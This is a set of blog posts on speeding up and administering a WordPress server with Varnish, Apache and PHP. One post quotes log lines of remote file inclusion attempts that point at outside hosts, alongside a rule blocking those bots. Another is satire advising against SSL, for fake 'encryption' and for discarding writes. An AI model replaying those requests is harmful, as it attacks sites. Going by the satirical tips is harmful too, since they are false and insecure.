Speed up WordPress with Apache and Varnish

Varnish is an open source, state of the art web application accelerator.

What it does is make your existing site faster by caching requests so your web server doesn’t have to handle them. This helps because your web server may be a lumbering giant like Apache that is loaded up with extra functionality like PHP, the GD library, mod_rewrite and all the other tools you need to make your website. All these modules unfortunately make your general purpose web server slower and heavier so by avoiding it your site spits out pages much faster!

Varnish sits in front of your webserver. Most documentation I’ve read on the subject suggest having Apache listen on any port other than port 80 and then have Varnish listen on port 80 of the external IP address. There’s no need to do this as I configured Apache to listen on port 80 of the 127.0.0.1 or localhost address while Varnish sits on the external IP.

Installing Varnish

Setting up Varnish is fairly easy. I’m going to assume that you’re already using Apache and On a Debian based system just use this to install it (as root)

apt-get install varnish

Apache

You need to configure Apache first. It has to listen on port 80 of the localhost interface. Edit /etc/apache2/ports.conf and change the following settings:

NameVirtualHost 127.0.0.1:80
Listen 127.0.0.1:80

Normally Apache listens on port 80 of all interfaces so you’ll probably just have to add “127.0.0.1:” in front of the 80.

Varnish

By default Varnish won’t start. You need to edit /etc/default/varnish. Change the following options in that file:

START=yes

DAEMON_OPTS="-a EXTERNAL_IP_ADDRESS:80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s file,/var/lib/varnish/$INSTANCE/varnish_storage.bin,1G"

Replace EXTERNAL_IP_ADDRESS with the IP of your external IP address.

Now edit /etc/varnish/default.vcl. The file should already exist but most of it is commented out. First of all change the “Backend default”:

backend default {
    .host = "127.0.0.1";
    .port = "80";
}

This tells Varnish that Apache is listening on port 80 of the localhost interface.

I’m going to define several functions in the default.vcl now. Comments in the code should explain what most of it does.

# Called after a document has been successfully retrieved from the backend.
sub vcl_fetch {
    # Uncomment to make the default cache "time to live" is 5 minutes, handy 
    # but it may cache stale pages unless purged. (TODO)
    # By default Varnish will use the headers sent to it by Apache (the backend server)
    # to figure out the correct TTL. 
    # WP Super Cache sends a TTL of 3 seconds, set in wp-content/cache/.htaccess

    # set beresp.ttl   = 300s;

    # Strip cookies for static files and set a long cache expiry time.
    if (req.url ~ "\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|pdf|txt|tar|wav|bmp|rtf|js|flv|swf|html|htm)$") {
            unset beresp.http.set-cookie;
            set beresp.ttl   = 24h;
    }

    # If WordPress cookies found then page is not cacheable
    if (req.http.Cookie ~"(wp-postpass|wordpress_logged_in|comment_author_)") {
        set beresp.cacheable = false;
    } else {
        set beresp.cacheable = true;
    }

    # Varnish determined the object was not cacheable
    if (!beresp.cacheable) {
        set beresp.http.X-Cacheable = "NO:Not Cacheable";
    } else if ( req.http.Cookie ~"(wp-postpass|wordpress_logged_in|comment_author_)" ) {
        # You don't wish to cache content for logged in users
        set beresp.http.X-Cacheable = "NO:Got Session";
        return(pass);
    }  else if ( beresp.http.Cache-Control ~ "private") {
        # You are respecting the Cache-Control=private header from the backend
        set beresp.http.X-Cacheable = "NO:Cache-Control=private";
        return(pass);
    } else if ( beresp.ttl < 1s ) {
        # You are extending the lifetime of the object artificially
        set beresp.ttl   = 300s;
        set beresp.grace = 300s;
        set beresp.http.X-Cacheable = "YES:Forced";
    } else {
        # Varnish determined the object was cacheable
        set beresp.http.X-Cacheable = "YES";
    }
    if (beresp.status == 404 || beresp.status >= 500) {
        set beresp.ttl = 0s;
    }

    # Deliver the content
    return(deliver);
}

sub vcl_hash {
    # Each cached page has to be identified by a key that unlocks it.
    # Add the browser cookie only if a WordPress cookie found.
    if ( req.http.Cookie ~"(wp-postpass|wordpress_logged_in|comment_author_)" ) {
        set req.hash += req.http.Cookie;
    }
}

# Deliver
sub vcl_deliver {
    # Uncomment these lines to remove these headers once you've finished setting up Varnish.
    #remove resp.http.X-Varnish;
    #remove resp.http.Via;
    #remove resp.http.Age;
    #remove resp.http.X-Powered-By;
}

# vcl_recv is called whenever a request is received
sub vcl_recv {
    # remove ?ver=xxxxx strings from urls so css and js files are cached.
    # Watch out when upgrading WordPress, need to restart Varnish or flush cache.
    set req.url = regsub(req.url, "\?ver=.*$", "");

    # Remove "replytocom" from requests to make caching better.
    set req.url = regsub(req.url, "\?replytocom=.*$", "");

    remove req.http.X-Forwarded-For;
    set    req.http.X-Forwarded-For = client.ip;

    # Exclude this site because it breaks if cached
    #if ( req.http.host == "example.com" ) {
    #    return( pass );
    #}

    # Serve objects up to 2 minutes past their expiry if the backend is slow to respond.
    set req.grace = 120s;
    # Strip cookies for static files:
    if (req.url ~ "\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|pdf|txt|tar|wav|bmp|rtf|js|flv|swf|html|htm)$") {
        unset req.http.Cookie;
        return(lookup);
    }
    # Remove has_js and Google Analytics __* cookies.
    set req.http.Cookie = regsuball(req.http.Cookie, "(^|;\s*)(__[a-z]+|has_js)=[^;]*", "");
    # Remove a ";" prefix, if present.
    set req.http.Cookie = regsub(req.http.Cookie, "^;\s*", "");
    # Remove empty cookies.
    if (req.http.Cookie ~ "^\s*$") {
        unset req.http.Cookie;
    }
    if (req.request == "PURGE") {
        if (!client.ip ~ purge) {
                error 405 "Not allowed.";
        }
        purge("req.url ~ " req.url " && req.http.host == " req.http.host);
        error 200 "Purged.";
    }

    # Pass anything other than GET and HEAD directly.
    if (req.request != "GET" && req.request != "HEAD") {
        return( pass );
    }      /* We only deal with GET and HEAD by default */

    # remove cookies for comments cookie to make caching better.
    set req.http.cookie = regsub(req.http.cookie, "1231111111111111122222222333333=[^;]+(; )?", "");

    # never cache the admin pages, or the server-status page
    if (req.request == "GET" && (req.url ~ "(wp-admin|bb-admin|server-status)")) {
        return(pipe);
    }
    # don't cache authenticated sessions
    if (req.http.Cookie && req.http.Cookie ~ "(wordpress_|PHPSESSID)") {
        return(pass);
    }
    # don't cache ajax requests
    if(req.http.X-Requested-With == "XMLHttpRequest" || req.url ~ "nocache" || req.url ~ "(control.php|wp-comments-post.php|wp-login.php|bb-login.php|bb-reset-password.php|register.php)") {
        return (pass);
    }
    return( lookup );
}

Notes:

  1. Varnish caches Javascript and CSS files without the cache buster ?ver=xxxx parameter. Varnish doesn’t cache any url with a GET parameter so those files weren’t getting cached at all.
  2. The code removes the Cookies for Comments cookie after it checks for GET and HEAD requests. This improved caching significantly as web pages are not cached with and without that cookie. They are all cached without it. The cache hit/miss ratio went up significantly when I made these two changes.
  3. I have a private site on this server that requires login. I had to stop Varnish caching this site as the privacy plugin thought I wasn’t logged in. See the example.com code above.
  4. If pages were purged Varnish could store cached pages for much longer.

As I didn’t modify WordPress so it would issue PURGE commands there are probably issues with the cache keeping slightly stale pages cached but I haven’t seen it happen or receive complaints about that.

PHP

Since all requests to Apache come from the local server PHP will think that the remote host is the local server. By using an auto_prepend_file set in your php.ini or .htaccess file you can tell PHP what the real IP is with this code:

if ( isset( $_SERVER[ "HTTP_X_FORWARDED_FOR" ] ) ) {
        $_SERVER[ 'REMOTE_ADDR' ] = $_SERVER[ "HTTP_X_FORWARDED_FOR" ];
}

You’ll see a huge improvement if you use Apache, especially if you don’t use a full page caching plugin like WP Super Cache on your WordPress site.

To see exactly how well Varnish is working use varnishstat and watch the ratio of cache hit and miss requests. This will vary depending on your TTL and by how much time Varnish has had to populate the cache. You can also configure logging using varnishncsa as described on this page:

varnishncsa -a -w /var/log/varnish/access.log -D -P /var/run/varnishncsa.pid

Now use multitail to watch /var/log/varnish/access.log and your web server’s access log.

I used a number of sites for help when setting this up. Here are a few:

I have tried Nginx in the past but could not getting it working without causing huge CPU spikes as PHP went a little mad. In comparison, Varnish was simple to install and set up. Have you tried Varnish yet? How can I improve the code above?

Edit: It looks like someone else has done the hard work. I must give the WordPress Varnish plugin a go.

This plugin purges your varnish cache when content is added or edited. This includes when a new post is added, a post is updated or when a comment is posted to your blog.

Who's abusing your website?

I wanted to know what IP addresses were hitting my website. I’d done this before and it only took a moment or two to recreate the following commands. Still, here it is for future reference.

grep -v "wp-content" access.log|grep -v wp-includes|cut -f 1 -d " "|sort|uniq -c|sort -nr|less

This code:

  • Excludes “wp-content” and “wp-includes” requests.
  • Uses “cut” to cut out the IP address.
  • Sorts the list of IP addresses.
  • Uses “uniq” to count the occurrence of each IP.
  • And finally reverse sorts the list again, by number of occurrences, with the largest number at the top.

You’ll probably find Google and Yahoo! bots near the top of the list, but I also found the “Jyxobot/1” bot was quite busy today.

Keep the libwww-perl bots out

If you look through your server logs you’ll probably notice more than a few requests like these:

GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? … “libwww-perl/5.805”
GET /2004/02/18/smoking-ban-is-on-the-way/trackback/ … “libwww-perl/5.805”
GET /2004/02/18/irish-car-tax-list/trackback/ … “libwww-perl/5.805”
GET /tag/php//tags.php?BBCodeFile=http://drpepper.gigacities.net/id.txt? … “libwww-perl/5.579”

If you do find them (grep libwww-perl access_log) then add the following code to your .htaccess file. On a WordPress site this file should already be there if you’re using fancy permalinks.

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* – [F,L]

Change “RewriteBase /” to suit your own base directory.

There are other bad guys out there. This page has a long list of rewrite rules to keep out all sorts of bots! I haven’t looked through them myself so YMMV if you try them.

This has the added benefit of reducing load on your server. WordPress sites are dynamically generated. This is great under normal circumstances but when you get a flood of requests it can place an unnecessary load on your site. WP-Cache helps a lot but these rules will stop them dead at the front door!

PS. ‘Course, if you depend on a libwww-perl application then don’t add this rule or you may give yourself a headache trying to figure out why things stopped working!

Notes when upgrading to PHP5

I upgraded one of my servers to PHP5 this morning. Two things to watch out for:

  • The location of your php.ini may have changed. It’s probably now in /etc/php5/apache2/. You need to copy over any changes from your old one.
  • Update your libraries too such as the mysql client and the gd library. Don’t forget you can delete the old ones. apt-get install php5-mysql php5-gd will do the job of installing, the old packages have a php4 prefix.
  • WP-Cache doesn’t like PHP5 much. If you see a blank page after upgrading to PHP5, then hit reload and it loads, then WP-Cache needs to be modified. Leroy has the fix, open wp-cache-phase2.php in your wp-cache folder and change ob_end_clean() to ob_end_flush(). SImple as that!

The reason for the upgrade? I wanted to install the gd extension, but after lots of fun upgrading everything my browser tried to download every page, complaining that it was a phtml file. I chose the upgrade to PHP5 to fix it!

And finally, the reason for gd, was to get the heatmap in this wordpress click tracking plugin working. It’s like Crazy Egg and it works well, but I couldn’t get it to display a heatmap for any page other than the front page. Some of the comments on Daily Blog Tips where I found it are hilarious. They completely miss the point of using a heatmap!

The real way to improve server performance

If you want to improve server performance, the best way is to move as much of the processing off it and onto the client machine. All those visitors of yours are running souped up AMD and Intel CPUs with their big screens and fat harddrives. No wonder your small little hosting plan can’t keep up. Here are some very good ideas from a Slashdot comment I read this morning.

  • Databases can get pretty slow with complicated queries, so upload your database to the client when they load the page and then your database queries are distributed.
  • PHP isn’t very fast, and neither are Perl or Python, so you don’t want to be running them on the server either. Write an interpreter for the language of your choice in Javascript and move your business logic to the client. This will also interface better with the client side database copy.
  • SSL is a performance killer, don’t use it. If you need to send something securely just prefix it with a predetermined number of random letters and numbers, no one will think to look beyond them.
  • Writing to databases can be pretty bad too. Try discarding all your changes, your users might not notice the difference, but they will appreciate the performance gain.

Check out the original post for a few more invaluable nuggets. If you follow all these tips you’ll be well on your way to becoming a respected and l33t hacker.

And now the big news. I’m really excited about this. The next version of WordPressMU will have a special Javascript client-side db (JCSDB) library built in. JCSDB will enable distributed and parallel access to your WPMU db without the danger of harming your servers. The best thing about it? If your site is dugg or slashdotted then your visitor’s machines will handle the load transparently. Instead of using slow and ungainly TCP/IP the library will use super-quick UDP to communicate. It really is the best way of sending data over the Internet.

I expect Matt will roll out JCSDB on WordPress.com just as soon as a few of the final bugs are ironed out. It might be a bit of headache for Barry and Demitrious to administer, but at least we can get rid of at least half our servers and use them to power a massive game of Counter Strike at the next WordCamp.

Update on May 31st! You all thought this was a joke didn’t you? Well, Google Gears has just been released and “is an open source browser extension that enables web applications to provide offline functionality”.

  • Store and serve application resources locally.
  • Store data locally in a fully-searchable relational database
  • Run asynchronous Javascript to improve application responsiveness.

It’s still in beta but Google Reader already supports it by allowing you to download up to 2000 items to read offline. This could be useful when I’m flying to SF next July!

Cannot load mysql extension. Please check your PHP configuration.

A friend recently had a problem configuring a new server. He installed PHP, Apache, MySQL and phpMyAdmin but when he launched it he got the following error:

phpMyAdmin – Error
Cannot load mysql extension. Please check your PHP configuration.

If you’ve installed all of the above more than once you’ll know what is more than likely wrong. The MySQL PHP module isn’t loaded. First of all, you must find your php.ini. It could be anywhere but if you create a small php file with the phpinfo(); command it will tell you where it is. Common places include /etc/apache/, /etc/php4/apache2/php.ini, /etc/php5/apache2/php.ini or even /usr/local/lib/php.ini

Edit your server’s php.ini and look for the following line. Remove the ‘;’ from the start of the line and restart Apache. Things should work fine now!

;extension=mysql.so

should become

extension=mysql.so

Gzip Compression or No?

mod_gzip, zlib.output_compression or whatever way you compress your web pages is a great way of reducing your network traffic costs but comes at the cost of increased CPU usage. Despite what you might think, it can be more expensive to send data over the network, especially to slow clients than compress it first of all and send a smaller burst.

Unfortunately this little server may not be up to the task of gzipping content at an acceptable rate to make it worthwhile. I’ll leave it run for another few hours and check the stats tomorrow.